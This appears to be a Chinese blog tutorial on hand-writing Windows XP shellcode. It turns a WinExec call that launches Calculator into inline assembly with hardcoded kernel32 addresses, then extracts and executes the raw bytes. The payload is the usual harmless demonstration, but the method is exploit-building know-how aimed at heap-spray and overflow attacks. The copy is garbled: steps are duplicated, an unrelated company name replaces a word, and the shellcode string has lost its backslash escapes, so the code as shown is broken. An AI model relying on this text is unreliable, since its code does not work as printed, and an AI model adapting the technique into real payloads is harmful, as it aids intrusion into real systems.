ShellCode的编写入门

上次学习了下堆喷漏洞的原理，虽说之前有学习过缓冲区溢出的原理，但还没了解过堆喷这个概念，于是趁此机会学习了，顺便复习了缓冲区溢出这块知识，之前由于各种原因对Shellcode的编写只是了解个大概，并没有真正动手写过一个Shellcode。眼前遇到个堆喷漏洞找Shellcode时就下决定自己写个Shellcode，考虑到时间和精力的有限就写个计算器简单的练练手。

注：以下在XP SP3+VC6.0编译成功

一、首先写个简单的调用计算器的程序。

1. 注：以下在XP SP3+VC6.0编译成功

   一、首先写个简单的调用计算器的程序。

   1. #include "windows.h"
   2. int main()
   3. {
   4. LoadLibraryA("kernel32.dll");//4c801d7b
   5. WinExec("calc.exe",SW_SHOW);
   6. return 0;
   7. }

   二、将WinExec("calc.exe",SW_SHOW);转化为汇编模样。

   在WinExec("calc.exe",SW_SHOW);处下断点，点F5进行调试，运行到此处时程序会暂停下来，程序暂停后按Alt+8即可查看到对应的汇编代码，经整理后如下：

   点击(此处)折叠或打开

   1. #include "windows.h"
   2. int main()
   3. {
   4. LoadLibraryA("kernel32.dll");//4c801d7b
   5. WinExec("calc.exe",SW_SHOW);
   6. __asm{
   7. mov esi,esp
   8. push 5
   9. push offset string "calc.exe" (0042201c)
   10. call dword ptr [__imp__WinExec@8 (0042a14c)]
   11. cmp esi,esp
   12. call __chkesp (00401090)
   13. }
   14. return 0;
   15. }

   稍微懂那么一丢丢汇编的童鞋都知道0042a14c处放着WinExec的地址，这里要注意WinExec的地址不是现在看到的0042a14c，要在地址为0042a14c放着的东东才是WinExec的地址。打个比方0042a14c是个指针，指针所指的地方才是真正需要的东东，所以我们要取出地址为0042a14c存放的数据。在VC6.0下按Alt+6可调出内存窗口，输入0042a14c即可看到。

2. 

3. 因此WinExec真正的地址是7C8623AD，注意，这里是要反过来读取。

   三、现在有了汇编模样的语句和WinExec的地址，接下来就是要转化为具有Shellcode的汇编代码。在转化汇编时先了解汇编下面是如何完成一个函数调用的：

   1、父函数将函数的实参按照从右至左顺序压入堆栈；

   2、CPU将父函数中函数调用指令Call XXXXXXXX的下一条指令地址EIP压入堆栈；

   3、父函数通过Push Ebp将基地指针Ebp值东方钽业堆栈，并通过Mov Ebp,Esp指令将当前堆栈指针Esp值传给Ebp；

   4、通过Sub Esp,m(m是字节数)指令可以为存放函数中的局部变量开辟内存。函数在执行的时候如果需要访问实参或局部变量，都可以通过EBP指针来指引完成。

   根据汇编调用函数特点，并使用压栈的方法将参数传递进行，便可得到如下代码：

   点击(此处)折叠或打开

   1. #include "windows.h"
   2. int main()
   3. {
   4. LoadLibraryA("kernel32.dll");//4c801d7b
   5. //WinExec("calc.exe",SW_SHOW);
   6. __asm
   7. {
   8. push    ebp;
   9. mov        ebp,esp;
   10. xor eax,eax;
   11. push eax;
   12. sub esp,08h;
   13. mov byte ptr [ebp-0Ch],63h; //c
   14. mov byte ptr [ebp-0Bh],61h; //a
   15. mov byte ptr [ebp-0Ah],6Ch; //l
   16. mov byte ptr [ebp-09h],63h; //c
   17. mov byte ptr [ebp-08h],2Eh; //.
   18. mov byte ptr [ebp-07h],65h; //e
   19. mov byte ptr [ebp-06h],78h; //x
   20. mov byte ptr [ebp-05h],65h; //e
   21. lea eax,[ebp-0ch];
   22. push eax;                    //将calc.exe压入栈内
   23. mov        eax,0x7C8623AD;
   24. call    eax;                    //调用WinExec
   25. mov esp,ebp;
   26. pop    ebp;
   27. }
   28. return 0;
   29. }

   注意，字符串要以00H结束的哦，编译运行OK~~

   四、到这里已经完成最难的部分了，接下来的工作即是将汇编在内存中的代码，即是Shellcode拷出来就是了。同样，在汇编代码任意一处下断点，让程序在断点处停下来，按Alt+8即可看到程序所在的内存地址，再按Alt+6调出内存窗口即可。

4. 

   1. 将汇编代码范围内的东东全拷出来即得到传说中的Shellcode，这就是程序运行在内存中的模样了。一翻苦工后即可得到有Shellcode模样的Shellcode，同理将LoadLibraryA同样进行转化即可得到一个完整的Shellcode。

      点击(此处)折叠或打开

      1. //LoadLibraryA("kernel32.dll");
      2. //WinExec("calc.exe",SW_SHOW);
      3. #include "windows.h"
      4. unsigned char shellcode[]=
      5. "x55x8BxECx33xC0x50x83"
      6. "xECx09xC6x45xF3x6BxC6"
      7. "x45xF4x65xC6x45xF5x72"
      8. "xC6x45xF6x6ExC6x45xF7"
      9. "x65xC6x45xF8x6CxC6x45"
      10. "xF9x33xC6x45xFAx32xC6"
      11. "x45xFBx2ExC6x45xFCx64"
      12. "xC6x45xFDx6CxC6x45xFE"
      13. "x6Cx8Dx45xF3x50xB8x7B"
      14. "x1Dx80x7CxFFxD0x8BxE5"
      15. "x33xC0x50x83xECx08xC6"
      16. "x45xF4x63xC6x45xF5x61"
      17. "xC6x45xF6x6CxC6x45xF7"
      18. "x63xC6x45xF8x2ExC6x45"
      19. "xF9x65xC6x45xFAx78xC6"
      20. "x45xFBx65x8Dx45xF4x50"
      21. "xB8xADx23x86x7CxFFxD0"
      22. "x8BxE5x5D";
      23. main()
      24. {
      25. __asm
      26. {
      27. lea     eax,shellcode;
      28. call    eax;
      29. }
      30. }